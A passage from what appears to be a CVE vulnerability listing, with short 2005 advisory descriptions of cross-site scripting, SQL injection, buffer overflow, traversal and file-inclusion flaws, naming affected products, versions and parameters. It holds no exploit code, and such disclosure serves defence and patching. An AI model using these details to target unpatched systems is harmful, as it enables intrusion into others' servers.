parameters. [CVE-2005-3283] Cross-site scripting (XSS) vulnerability in TikiWiki before 1.9.1.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-3269] Stack-based buffer overflow in help.cgi in the HTTP administrative interface for (1) Sun Java System Directory Server 5.2 2003Q4, 2004Q2, and 2005Q1, (2) Red Hat Directory Server and (3) Certificate Server before 7.1 SP1, (4) Sun ONE Directory Server 5.1 SP4 and earlier, and (5) Sun ONE Administration Server 5.2 allows remote attackers to cause a denial of service (admin server crash), or local users to gain root privileges. [CVE-2005-3264] Cross-site scripting (XSS) vulnerability in thread.php for Zeroblog 1.1f and 1.2a allows remote attackers to inject arbitrary web script or HTML via the threadID parameter. [CVE-2005-3260] Multiple cross-site scripting (XSS) vulnerabilities in versatileBulletinBoard (vBB) 1.0.0 RC2 allow remote attackers to inject arbitrary web script or HTML via (1) the url parameter in dereferrer.php and (2) the file parameter in imagewin.php. [CVE-2005-3255] The (1) cgiwrap and (2) php-cgiwrap packages before 3.9 in Debian GNU/Linux provide access to debugging CGIs under the web document root, which allows remote attackers to obtain sensitive information via direct requests to those CGIs. [CVE-2005-3237] Cross-site scripting (XSS) vulnerability in Cyphor 0.19 allows remote attackers to inject arbitrary web script or HTML via the t_login parameter of footer.php. [CVE-2005-3218] Multiple interpretation error in unspecified versions of Dr.Web Antivirus allows remote attackers to bypass virus detection via a malicious executable in a specially crafted RAR file with malformed central and local headers, which can still be opened by products such as Winrar and PowerZip, even though they are rejected as corrupted by Winzip and BitZipper. [CVE-2005-3205] Cross-site scripting (XSS) vulnerability in iSQLPlus (iSQLPlus) in Oracle9i Database Server Release 2 9.0.2.4 allows remote attackers to inject arbitrary web script or HTML via script in the "set markup HTML TABLE" command, which is executed when the user selects a table. [CVE-2005-3204] Cross-site scripting (XSS) vulnerability in Oracle XML DB 9iR2 allows remote attackers to inject arbitrary web script or HTML via the query string in an HTTP request. [CVE-2005-3202] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTML DB (HTMLDB) 1.3 through 1.3.6 allow remote attackers to inject arbitrary web script or HTML, and subsequently execute SQL statements via the (1) p or (2) p_t02 parameters. [CVE-2005-3200] Multiple cross-site scripting (XSS) vulnerabilities in Utopia News Pro (UNP) 1.1.3 and 1.1.4 allow remote attackers to inject arbitrary web script or HTML via (1) the sitetitle parameter in header.php and (2) the version and (3) query_count parameters in footer.php. [CVE-2005-3198] Webroot Desktop Firewall before 1.3.0build52 allows local users to disable the firewall, even when password protection is enabled, via certain DeviceIoControl commands. [CVE-2005-3197] Stack-based buffer overflow in PWIWrapper.dll for Webroot Desktop Firewall before 1.3.0build52 allows local users to execute arbitrary code as SYSTEM by sending a crafted DeviceIoControl command, then removing an allowed program from the firewall list. [CVE-2005-3182] Buffer overflow in the HTTP management interface for GFI MailSecurity 8.1 allows remote attackers to execute arbitrary code via long headers such as (1) Host and (2) Accept in HTTP requests. NOTE: the vendor suggests that this issues is "in an underlying Microsoft technology" which, if true, could mean that the overflow affects other products as well. [CVE-2005-3165] Multiple cross-site scripting (XSS) vulnerabilities in MediaWiki before 1.4.9 allow remote attackers to inject arbitrary web script or HTML via (1) <math> tags or (2) Extension or <nowiki> sections that "bypass HTML style attribute restrictions" that are intended to protect against XSS vulnerabilities in Internet Explorer clients. [CVE-2005-3163] Unspecified vulnerability in Polipo 0.9.8 and earlier allows attackers to read files outside of the web root. [CVE-2005-3152] Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.3 allow remote attackers to inject arbitrary web script or HTML via the redir parameter to (1) cart.php or (2) index.php, or (3) the searchStr parameter in a viewCat action to index.php. Note: vectors (1) and (2) were later reported to affect 3.0.7-pl1. [CVE-2005-3143] Unspecified vulnerability in the Mailbox Server for 4D WebStar before 5.3.5 allows attackers to cause a denial of service (crash) via IMAP clients on Mac OS X 10.4 Mail 2. [CVE-2005-3136] Directory traversal vulnerability in Virtools Web Player 3.0.0.100 and earlier allows remote attackers to overwrite arbitrary files via a .. (dot dot) in a filename. [CVE-2005-3135] Buffer overflow in Virtools Web Player 3.0.0.100 and earlier allows remote attackers to execute arbitrary code via a long filename. [CVE-2005-3133] Multiple directory traversal vulnerabilities in MERAK Mail Server 8.2.4r with Icewarp Web Mail 5.5.1, and possibly earlier versions, allows remote attackers to (1) delete arbitrary files or directories via a relative path to the id parameter to logout.html or (2) include arbitrary PHP files or other files via the helpid parameter to help.html. [CVE-2005-3132] MERAK Mail Server 8.2.4r with Icewarp Web Mail 5.5.1, and possibly earlier versions, allows remote attackers to obtain sensitive information via a direct request to bwlist_inc.html, which reveals the path in an error message. [CVE-2005-3131] Multiple cross-site scripting (XSS) vulnerabilities in MERAK Mail Server 8.2.4r with Icewarp Web Mail 5.5.1, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to blank.html, or the createdataCX parameter to (2) calendar_d.html, (3) calendar_m.html, or (4) calendar_w.html. [CVE-2005-3128] Cross-site scripting (XSS) vulnerability in add.php in Address Add Plugin 1.9 and 2.0 for Squirrelmail allows remote attackers to inject arbitrary web script or HTML via the IMG tag. [CVE-2005-3127] Cross-site scripting (XSS) vulnerability in index.php in lucidCMS 1.0.11 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2005-3104] mt-comments.cgi in Movable Type before 3.2 allows attackers to redirect users to other web sites via URLs in comments. [CVE-2005-3103] Cross-site scripting (XSS) vulnerability in Movable Type before 3.2 allows remote attackers to inject arbitrary web script or HTML via the (1) title, (2) category, (3) body, (4) extended body, and (5) excerpt form fields in new blog entries. [CVE-2005-3091] Cross-site scripting (XSS) vulnerability in Mantis before 1.0.0rc1 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, as identified by bug#0005751 "thraxisp". [CVE-2005-3090] Cross-site scripting (XSS) vulnerability in bug_actiongroup_page.php in Mantis 0.19.0a1 through 1.0.0a3 allows remote attackers to inject arbitrary web script or HTML via the summary of the bug, which is not quoted when view_all_bug_page.php is used to delete the bug, as identified by bug#0006002, a different vulnerability than CVE-2005-2557. [CVE-2005-3086] Directory traversal vulnerability in admin/about.php in contentServ 3.1 allows remote attackers to read or include arbitrary files via ".." sequences in the ctsWebsite parameter. [CVE-2005-3085] Multiple cross-site scripting (XSS) vulnerabilities in rss.php in Riverdark Studios RSS Syndicator module 2.1.7 allow remote attackers to inject arbitrary web script or HTML via the (1) forum or (2) topic parameters. [CVE-2005-3083] Cross-site scripting (XSS) vulnerability in index.php in CMS Made Simple 0.10 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2005-3078] Cross-site scripting (XSS) vulnerability in PunBB before 1.2.8 allows remote attackers to inject arbitrary web script or HTML via the "forgotten e-mail" feature. [CVE-2005-3077] Microsoft Internet Explorer 5.2.3 for Mac OS allows remote attackers to cause a denial of service (crash) via a web page with malformed attributes in a BGSOUND tag, possibly involving double-quotes in an about: URI. [CVE-2005-3067] Cross-site scripting (XSS) vulnerability in perldiver.cgi in PerlDiver 2.x allows remote attackers to inject arbitrary web script or HTML via the module parameter. [CVE-2005-3066] Cross-site scripting (XSS) vulnerability in perldiver.pl in PerlDiver 1.x allows remote attackers to inject arbitrary web script or HTML via the query string. NOTE: this issue was originally disputed by the vendor, but it has since been acknowledged. [CVE-2005-3058] Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616. [CVE-2005-3049] PhpMyFaq 1.5.1 stores data files under the web document root with insufficient access control and predictable filenames, which allows remote attackers to obtain sensitive information via a direct request to the data/tracking[DATE] file. [CVE-2005-3047] Multiple cross-site scripting (XSS) vulnerabilities in PhpMyFaq 1.5.1 allow remote attackers to inject arbitrary web script or HTML via the (1) PMF_CONF[version] parameter to footer.php or (2) PMF_LANG[metaLanguage] to header.php. [CVE-2005-3042] miniserv.pl in Webmin before 1.230 and Usermin before 1.160, when "full PAM conversations" is enabled, allows remote attackers to bypass authentication by spoofing session IDs via certain metacharacters (line feed or carriage return). [CVE-2005-3041] Unspecified "drag-and-drop vulnerability" in Opera Web Browser before 8.50 on Windows allows "unintentional file uploads." [CVE-2005-3037] Cross-site scripting (XSS) vulnerability in Handy Address Book Server 1.1 allows remote attackers to inject arbitrary web script or HTML via the SEARCHTEXT parameter in a demos URL. [CVE-2005-3033] Stack-based buffer overflow in vxWeb 1.1.4 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request. [CVE-2005-3025] Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 3.0.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the loc parameter to (1) modcp/index.php or (2) admincp/index.php, or the ip parameter to (3) modcp/user.php or (4) admincp/usertitle.php. [CVE-2005-3023] Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 3.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via certain arguments to (1) announcement.php, (2) admincalendar.php, (3) bbcode.php, (4) cronadmin.php, (5) email.php, (6) faq.php, (7) forum.php, (8) image.php, (9) language.php, (10) ranks.php, (11) replacement.php, (12) replacement.php, (13) template.php, (14) template.php, (15) usergroup.php, or (16) usertitle.php. [CVE-2005-3020] Multiple cross-site scripting (XSS) vulnerabilities in vBulletin before 3.0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) group parameter to css.php, (2) redirect parameter to index.php, (3) email parameter to user.php, (4) goto parameter to language.php, (5) orderby parameter to modlog.php, and the (6) hex, (7) rgb, or (8) expandset parameter to template.php. [CVE-2005-3017] PHP file inclusion vulnerability in index.php in Content2Web 1.0.1 allows remote attackers to include arbitrary files via the show parameter, which can lead to resultant errors such as path disclosure, SQL error messages, and cross-site scripting (XSS). [CVE-2005-3015] Cross-site scripting (XSS) vulnerability in IBM Lotus Domino 6.5.2 allows remote attackers to inject arbitrary web script or HTML via the (1) BaseTarget or (2) Src parameters. [CVE-2005-3014] Cross-site scripting (XSS) vulnerability in Ensim webplliance allows remote attackers to inject arbitrary web script or HTML via the Login (OCW_login_username) field. [CVE-2005-3009] Cross-site scripting (XSS) vulnerability in CuteNews allows remote attackers to inject arbitrary web script or HTML via the mod parameter to index.php. [CVE-2005-3006] The mail client in Opera before 8.50 opens attached files from the user's cache directory without warning the user, which might allow remote attackers to inject arbitrary web script and spoof attachment filenames. [CVE-2005-3000] Multiple cross-site scripting (XSS) vulnerabilities in viewers/txt.php in PHP Advanced Transfer Manager 1.30 allow remote attackers to inject arbitrary web script or HTML via the (1) font, (2) normalfontcolor, or (3) mess[31] parameters. [CVE-2005-2994] Unspecified vulnerability in the web client for IBM Rational ClearQuest 2002.05.00 and 2002.05.20, and 2003.06.00 through 2003.06.15 before SR5, allows remote attackers to execute XML Style Sheets (XSS). [CVE-2005-2985] SQL injection vulnerability in search_result.php in AEwebworks aeDating Script 4.0 and earlier allows remote attackers to execute arbitrary SQL statements via the Country parameter. [CVE-2005-2982] Cross-site scripting (XSS) vulnerability in CompaqHTTPServer 2.1 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly quoted in the resulting 404 error page. [CVE-2005-2981] Cross-site scripting (XSS) vulnerability in Orion 1.3.8 and 1.4.5 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly quoted in the resulting 404 error page. [CVE-2005-2980] Cross-site scripting (XSS) vulnerability in index.php in phpoutsourcing Noah's classifieds 1.3 allows remote attackers to inject arbitrary web script or HTML via the rollid parameter. [CVE-2005-2956] ATutor 1.5.1, and possibly earlier versions, stores temporary chat logs under the web document root with insufficient access control and predictable filenames, which allows remote attackers to obtain user chat conversations via direct requests to those files. [CVE-2005-2953] Cross-site scripting (XSS) vulnerability in merchant.mvc in MIVA Merchant 5 allows remote attackers to inject arbitrary web script or HTML via the Customer_Login parameter. [CVE-2005-2950] Cross-site scripting (XSS) vulnerability in Sawmill 7.0.0 through 7.1.13 allows remote attackers to inject arbitrary web script or HTML via the query string in an HTTP GET request. [CVE-2005-2901] Multiple Cross-site scripting (XSS) vulnerabilities in CjWeb2Mail 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) message, or (3) ip parameter to thankyou.php or (4) emsg parameter to web2mail.php. [CVE-2005-2900] Cross-site scripting (XSS) vulnerability in top.php in CjLinkOut 1.0 allows remote attackers to inject arbitrary web script or HTML via the 123 parameter. [CVE-2005-2899] Multiple cross-site scripting (XSS) vulnerabilities in details.php in CjTagBoard 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) date, (2) time, (3) name, (4) ip, (5) agent, or (6) msg parameter. [CVE-2005-2897] WEB//NEWS 1.4 allows remote attackers to obtain sensitive information via a direct request to files in the actions directory, which reveal the path in an error message, as demonstrated using cat.add.php. [CVE-2005-2896] SQL injection vulnerability in WEB//NEWS 1.4 allows remote attackers to execute arbitrary SQL commands via the (1) wn_userpw parameter to startup.php, (2) cat, (3) id, or (4) stof parameter to news.php, or (5) id parameter to print.php. [CVE-2005-2894] Cross-site scripting (XSS) vulnerability in the user registration in PBLang 4.65, and possibly earlier versions, allows remote attackers to inject arbitrary web script or PHP via the location field. [CVE-2005-2891] WebArchiveX.dll 5.5.0.76 installed before September 6th, 2005 is marked safe for scripting by default, which allows remote attackers to read or write to arbitrary files via the (1) MakeArchive or (2) MakeArchiveStr methods. [CVE-2005-2886] Multiple cross-site scripting (XSS) vulnerabilities in MAXdev MD-Pro 1.0.73, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via (1) the print parameter to the print module, the sitename parameter to (2) bb_smilies or (3) bbcode_ref module, or (4) the hlpfile parameter to openwindow.php. [CVE-2005-2884] Cross-site scripting (XSS) vulnerability in events.php in Land Down Under (LDU) 801 and earlier allows remote attackers to inject arbitrary web script or HTML via the Description field in an event. [CVE-2005-2882] Multiple cross-site scripting (XSS) vulnerabilities in phpCommunityCalendar 4.0.3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the LocationID parameter to (1) thankyou.php or (2) day.php, font parameter to (3) calDaily.php, (4) calMonthly.php, (5) calMonthlyP.php, (6) calWeekly.php, (7) calWeeklyP.php, (8) calYearly.php, (9) calYearlyP.php, (10) day.php, or (11) week.php, or (12) CeTi, (13) Contact, (14) Description, (15) ShowAddress parameter to event.php, and other attack vectors. [CVE-2005-2879] Advansysperu Software USB Lock Auto-Protect (AP) 1.5 uses a weak encryption scheme to encrypt passwords, which allows local users to gain sensitive information and bypass USB interface protection. [CVE-2005-2869] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.6.4 allow remote attackers to inject arbitrary web script or HTML via (1) the Username to libraries/auth/cookie.auth.lib.php or (2) the error parameter to error.php. [CVE-2005-2863] Cross-site scripting (XSS) vulnerability in openwebmail-main.pl in OpenWebMail 2.41 allows remote attackers to inject arbitrary web script or HTML via the sessionid parameter. [CVE-2005-2861] Cross-site scripting (XSS) vulnerability in N-Stealth Commercial Edition before 5.8.0.38 and Free Edition before 5.8.1.03 allows remote attackers to inject arbitrary web script or HTML via the Server field in an HTTP response header, which is directly injected into an HTML report. [CVE-2005-2860] Cross-site scripting (XSS) vulnerability in Nikto 1.35 and earlier allows remote attackers to inject arbitrary web script or HTML via the Server field in an HTTP response header, which is directly injected into an HTML report. [CVE-2005-2859] Savant Web Server stores user credentials in plaintext in the Savant\Users registry key, which allows local users to gain privileges. [CVE-2005-2855] Cross-site scripting (XSS) vulnerability in Unclassified NewsBoard 1.5.3 allows remote attackers to inject arbitrary web script or HTML via the description field. [CVE-2005-2853] Multiple cross-site scripting (XSS) vulnerabilities in GuppY 4.5.3a and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the pg parameter to printfaq.php, or the (2) Referer or (3) User-Agent HTTP headers, which are not properly handled by error.php. [CVE-2005-2840] Multiple unknown vulnerabilities in MAXdev MD-Pro 1.0.72 and earlier have unknown impact and unspecified attack vectors, in one or more of the (1) Download, (2) Search, (3) Web links, (4) Blocks, (5) Messages, (6) News, (7) Comments, (8) Settings, (9) Stats or (10) subjects modules. [CVE-2005-2839] Multiple cross-site scripting (XSS) vulnerabilities in MAXdev MD-Pro 1.0.72 allow remote attackers to inject arbitrary web script or HTML via (1) dl-search.php or (2) wl-search.php. [CVE-2005-2837] Multiple eval injection vulnerabilities in PlainBlack Software WebGUI before 6.7.3 allow remote attackers to execute arbitrary Perl code via (1) Help.pm, (2) International.pm, or (3) WebGUI.pm. [CVE-2005-2836] Multiple cross-site scripting (XSS) vulnerabilities in Phorum 5.0.17a and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter to register.php or (2) a signature of a logged-in user in "My Control Center," which is not properly handled by control.php. [CVE-2005-2831] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, aka a variant of the "COM Object Instantiation Memory Corruption Vulnerability," a different vulnerability than CVE-2005-2127. [CVE-2005-2820] Cross-site scripting (XSS) vulnerability in SqWebMail 5.0.4 allows remote attackers to inject arbitrary web script or HTML via an e-mail message containing Internet Explorer "Conditional Comments" such as "[if]" and "[endif]". [CVE-2005-2818] Cross-site scripting (XSS) vulnerability in DownFile 1.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter to (1) email.php,(2) index.php, (3) del.php, or (4) add_form.php. [CVE-2005-2816] Cross-site scripting (XSS) vulnerability in Greymatter allows remote attackers to inject arbitrary web script or HTML via a post comment, which is recorded in a log file but not properly handled when the administrator uses "View Control Panel Log" to read the log file. [CVE-2005-2814] Cross-site scripting (XSS) vulnerability in FlatNuke 2.5.6 allows remote attackers to inject arbitrary web script or HTML via the usr parameter in a vis_reg operation to index.php. [CVE-2005-2812] man2web allows remote attackers to execute arbitrary commands via -P arguments. [CVE-2005-2803] Cross-site scripting (XSS) vulnerability in Hiki 0.8.1 to 0.8.2 allows remote attackers to inject arbitrary web script or HTML via a page name in a Login link, a different vulnerability than CVE-2005-2336. [CVE-2005-2800] Memory leak in the seq_file implemenetation in the SCSI procfs interface (sg.c) in Linux kernel 2.6.13 and earlier allows local users to cause a denial of service (memory consumption) via certain repeated reads from the /proc/scsi/sg/devices file, which is not properly handled when the next() iterator returns NULL or an error. [CVE-2005-2783] Cross-site scripting (XSS) vulnerability in PHP-Fusion 6.00.107 and earlier allows remote attackers to inject arbitrary web script or HTML via nested, malformed URL BBCode tags. [CVE-2005-2780] Cross-site scripting (XSS) vulnerability in Land Down Under (LDU) allows remote attackers to inject arbitrary web script or HTML via a signature. [CVE-2005-2776] Multiple cross-site scripting (XSS) vulnerabilities in Looking Glass 20040427 allow remote attackers to inject arbitrary web script or HTML via the (1) version[fullname], (2) version[homepage], or (3) version[no] parameter to footer.php, or the (4) version[fullname], (5) version[no], (6) version[author], (7) version[email] parameter to header.php. [CVE-2005-2775] php_api.php in phpWebNotes 2.0.0 uses the extract function to modify key variables such as $t_path_core, which leads to a PHP file inclusion vulnerability that allows remote attackers to execute arbitrary PHP code via the t_path_core parameter. [CVE-2005-2772] Multiple stack-based buffer overflows in University of Minnesota gopher client 3.0.9 allow remote malicious servers to execute arbitrary code via (1) a long "+VIEWS:" reply, which is not properly handled in the VIfromLine function, and (2) certain arguments when launching third party programs such as a web browser from a web link, which is not properly handled in the FIOgetargv function. [CVE-2005-2769] Cross-site scripting (XSS) vulnerability in SqWebMail 5.0.4 and possibly other versions allows remote attackers to inject arbitrary web script or HTML via an HTML e-mail containing tags with strings that contain ">" or other special characters, which is not properly sanitized by SqWebMail. [CVE-2005-2765] The user interface in the Windows Firewall does not properly display certain malformed entries in the Windows Registry, which makes it easier for attackers with administrator privileges to hide activities if the administrator only uses the Windows Firewall interface to monitor exceptions. NOTE: the vendor disputes this issue, saying that since administrative privileges are already required, it is not a vulnerability. CVE has not yet formally decided if such "information hiding" issues should be included. [CVE-2005-2761] Cross-site scripting (XSS) vulnerability in phpGroupWare 0.9.16.000 allows administrators to inject arbitrary web script or HTML by modifying the main screen message. [CVE-2005-2758] Integer signedness error in the administrative interface for Symantec AntiVirus Scan Engine 4.0 and 4.3 allows remote attackers to execute arbitrary code via crafted HTTP headers with negative values, which lead to a heap-based buffer overflow. [CVE-2005-2752] An unspecified kernel interface in Mac OS X 10.4.2 and earlier does not properly clear memory before reusing it, which could allow attackers to obtain sensitive information, a different vulnerability than CVE-2005-1126 and CVE-2005-1406. [CVE-2005-2747] Buffer overflow in ImageIO for Apple Mac OS X 10.4.2, as used by applications such as WebCore and Safari, allows remote attackers to execute arbitrary code via a crafted GIF file. [CVE-2005-2737] Cross-site scripting (XSS) vulnerability in PhotoPost PHP Pro 5.1 allows remote attackers to inject arbitrary web script or HTML via EXIF data, such as the Camera Model Tag. [CVE-2005-2736] Cross-site scripting (XSS) vulnerability in YaPig 0.95 and earlier allows remote attackers to inject arbitrary web script or HTML via EXIF data, such as the Camera Model Tag. [CVE-2005-2735] Cross-site scripting (XSS) vulnerability in phpGraphy 0.9.9a and earlier allows remote attackers to inject arbitrary web script or HTML via EXIF data, such as the Camera Model Tag. [CVE-2005-2734] Cross-site scripting (XSS) vulnerability in Gallery 1.5.1-RC2 and earlier allows remote attackers to inject arbitrary web script or HTML via EXIF data, such as the Camera Model Tag. [CVE-2005-2731] Directory traversal vulnerability in Astaro Security Linux 6.0, when using Webmin, allows remote authenticated webmin users to read arbitrary files via a .. (dot dot) in the wfe_download parameter to index.fpl. [CVE-2005-2724] Cross-site scripting (XSS) vulnerability in SqWebMail 5.0.4 allows remote attackers to inject arbitrary web script or HTML via a file attachment that is processed by the Display feature. NOTE: the severity of this issue has been disputed by the developer. [CVE-2005-2722] Foojan PHP Weblog allows remote attackers to obtain sensitive information via (1) a direct request to /daylinks/index.php or (2) a negative value in the daylinkspage parameter to index.php, which reveal the path in an error message. [CVE-2005-2721] Multiple cross-site scripting (XSS) vulnerabilities in (1) index.php or (2) admin.php in Foojan PHP Weblog allow remote attackers to inject arbitrary web script or HTML via the Referer field in the HTTP header. [CVE-2005-2717] PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via send_reminders.php or other scripts. [CVE-2005-2715] Format string vulnerability in the Java user interface service (bpjava-msvc) daemon for VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and NetBackup Enterprise/Server/Client 5.0, 5.1, and 6.0, allows remote attackers to execute arbitrary code via the COMMAND_LOGON_TO_MSERVER command. [CVE-2005-2709] The sysctl functionality (sysctl.c) in Linux kernel before 2.6.14.1 allows local users to cause a denial of service (kernel oops) and possibly execute code by opening an interface file in /proc/sys/net/ipv4/conf/, waiting until the interface is unregistered, then obtaining and modifying function pointers in memory that was used for the ctl_table. [CVE-2005-2707] Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to spawn windows without user interface components such as the address and status bar, which could be used to conduct spoofing or phishing attacks. [CVE-2005-2704] Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to spoof DOM objects via an XBL control that implements an internal XPCOM interface. [CVE-2005-2698] Cross-site scripting (XSS) vulnerability in browse.php in Nephp Publisher Enterprise 3.04 allows remote attackers to inject arbitrary web script or HTML via a hex-encoded keywords parameter. [CVE-2005-2689] Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.760-RC4b allows remote attackers to inject arbitrary web script or HTML via (1) the moderate parameter to the Comments module or (2) htmltext parameter to html/user.php. [CVE-2005-2688] Multiple cross-site scripting (XSS) vulnerabilities in SaveWebPortal 3.4 allow remote attackers to inject arbitrary web script or HTML via a large number of parameters to (1) footer.php, (2) header.php, (3) menu_dx.php, or (4) menu_sx.php, or Javascript code in the (5) HTTP_REFERER (referer) or (6) HTTP_USER_AGENT (user agent) fields. [CVE-2005-2687] PHP remote file inclusion vulnerability in SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via the (1) SITE_Path parameter to menu_dx.php or (2) CONTENTS_Dir parameter to menu_sx.php. [CVE-2005-2686] Directory traversal vulnerability in SaveWebPortal 3.4 allows remote attackers to include arbitrary files and execute arbitrary local PHP programs via ".." sequences in the (1) SITE_Path parameter to menu_dx.php or (2) CONTENTS_Dir parameter to menu_sx.php. [CVE-2005-2685] SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via a direct request to admin/PhpMyExplorer/editerfichier.php, then editing the desired file to contain the PHP code, as demonstrated using header.php in the fichier parameter. NOTE: it is possible that this vulnerability stems from PhpMyExplorer, which is a separate package. [CVE-2005-2680] Unspecified vulnerability in BEA WebLogic Portal 8.1 through SP4, when using entitlements, allows remote attackers to bypass access restrictions for the pages of a Book via crafted URLs. [CVE-2005-2677] ACNews stores the database in a file under the web document root with a db.inc extension and insufficient access control, which allows remote attackers to obtain sensitive information such as the full pathname of the server. [CVE-2005-2676] Cross-site scripting (XSS) vulnerability in displayimage.php in Coppermine Photo Gallery before 1.3.4 allows remote attackers to inject arbitrary web script or HTML via EXIF data. [CVE-2005-2674] * DISPUTED Note: the vendor has disputed this issue. Multiple cross-site scripting (XSS) vulnerabilities in Land Down Under (LDU) 800 allow remote attackers to inject arbitrary web script or HTML via the (1) c or (2) m parameters to index.php or (3) w parameter to journal.php. NOTE: this issue has been disputed by the vendor, who says "None of the tricks written there are working, the variables are properly sanitized and no LDU version is affected." [CVE-2005-2653] Cross-site scripting (XSS) vulnerability in BBCaffe 2.0 allows remote attackers to inject arbitrary web script or HTML via e-mail data in a message. [CVE-2005-2650] Cross-site scripting (XSS) vulnerability in sign.asp in Emefa Guestbook 1.2 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) location, and (3) email parameters. [CVE-2005-2649] Cross-site scripting (XSS) vulnerability in ATutor 1.5.1 allows remote attackers to inject arbitrary web script or HTML via (1) course parameter in login.php or (2) words parameter in search.php. [CVE-2005-2647] Cross-site scripting (XSS) vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to inject arbitrary web script or HTML and modify web pages via unknown vectors. [CVE-2005-2646] Unknown vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to cause a denial of service or read files via unknown vectors involving crafted HTTP requests. [CVE-2005-2645] Unknown vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to bypass authentication. [CVE-2005-2638] Multiple cross-site scripting (XSS) vulnerabilities in PHPFreeNews 1.40 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) NewsMode parameter to NewsCategoryForm.php, or the (2) Match or (3) NewsMode parameter to SearchResults.php. [CVE-2005-2622] Cross-site scripting (XSS) vulnerability in index.php in ECW-Shop 6.0.2 allows remote attackers to inject arbitrary web script or HTML via the (1) max or (2) ctg parameter. [CVE-2005-2610] Cross-site scripting (XSS) vulnerability in index.php in VegaDNS 0.8.1, 0.9.8, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2005-2604] index.php for My Image Gallery (Mig ) 1.4.1 allows remote attackers to obtain the web server path via certain currDir and image arguments, which leaks the path in an error message. [CVE-2005-2603] Cross-site scripting (XSS) vulnerability in index.php for My Image Gallery (Mig ) 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the (1) currDir or (2) image parameters. [CVE-2005-2590] Cross-site scripting (XSS) vulnerability in Parlano MindAlign 5.0 and later versions allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-2588] Multiple cross-site scripting (XSS) vulnerabilities in DVBBS 7.1 SP2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the page parameter to dispbbs.asp, (2) name parameter to dispuser.asp, or the (3) title, (4) view, or (5) act parameter to boardhelp.asp. [CVE-2005-2586] Mentor ADSL-FR4II router running firmware 2.00.0111 stores the web administration password in cleartext in the backup configuration file, which allows local users to obtain sensitive information. [CVE-2005-2583] Mentor ADSL-FR4II router running firmware 2.00.0111 has an undocumented web server running on TCP port 5678, which allows local users to gain access. [CVE-2005-2569] Multiple cross-site scripting (XSS) vulnerabilities in FunkBoard 0.66CF, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the fbusername or fbpassword parameter to (1) editpost.php, (2) prefs.php, (3) newtopic.php, (4) reply.php, or (5) profile.php, the (6) fbusername, (7) fmail, (8) www, (9) icq, (10) yim, (11) location, (12) sex, (13) interebbies, (14) sig or (15) aim parameter to register.php, or (16) subject parameter to newtopic.php. [CVE-2005-2563] Multiple cross-site scripting (XSS) vulnerabilities in Gravity Board X (GBX) 1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the board_id parameter to deletethread.php or (2) the template. [CVE-2005-2560] Cross-site scripting (XSS) vulnerability in index.cfm in CFBB 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2005-2557] Cross-site scripting (XSS) vulnerability in view_all_set.php in Mantis 0.19.0a1 through 1.0.0a3 allows remote attackers to inject arbitrary web script or HTML via the dir parameter, as identified by bug#0005959, and a different vulnerability than CVE-2005-3090. [CVE-2005-2554] The web server for Network Associates ePolicy Orchestrator Agent 3.5.0 (patch 3) uses insecure permissions for the "Common Framework\Db" folder, which allows local users to read arbitrary files by creating a subfolder in the EPO agent web root directory. [CVE-2005-2545] Multiple cross-site scripting (XSS) vulnerabilities in PHPOpenChat 3.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) title or (2) content parameter to profile.php and profile_misc.php, (3) the profile fields in userpage.php, (4) subject or (5) body in mail.php, or (8) disinvited_chatter or (7) invited_chatter parameter to invite.php. [CVE-2005-2542] Invision Power Board (IPB) 1.0.3 allows remote 